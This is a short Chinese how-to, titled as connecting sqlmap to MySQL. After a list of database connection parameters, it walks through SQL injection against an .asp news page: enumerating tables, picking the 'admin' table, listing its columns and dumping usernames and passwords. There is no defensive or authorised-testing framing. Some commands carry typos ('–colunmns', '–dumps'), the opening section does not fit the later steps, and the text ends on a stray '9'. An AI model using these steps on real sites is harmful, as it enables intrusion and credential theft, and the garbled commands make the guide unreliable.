怎么用sqlmap连接mysql

[1]dbms:代表所使用的数据库，如我们这里是mysql

[2]user:对应我们数据库的用户，如我们这里是root

[3]password:对应我们数据的密码，如我的服务器为3erver

[4]dbma_IP:数据库服务器对应的ip地址，如我这里为192.168.80.128

[5]dbms_PORT:数据服务器所使用的端口，不能省略。默认我们写3306

[6]database_NAME:你要使用的数据库名，因为mysql一般会有test数据库，如我这里使用test。假如没有test，我们可以自己使用create database test创建一个.

方法/步骤

首先我们先来跑表

命令是sqlmap –u “url/NewsShow.asp?id=69” –tables

一路上大家遇到这个

可以直接选择回车

等到了这里

大家选择线程1到10

开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表

然后我们直接再次输入命令sqlmap –u “url/NewsShow.asp?id=69” –colunmns –T admin

然后得到了里面的字段username password id

然后我们直接跑字段内容sqlmap –u “url/NewsShow.asp?id=69” –dumps –T admin –C “username,password”

然后一路还是回车。到了

还是选择线程1到10

最后跑出了用户名。密码

9

---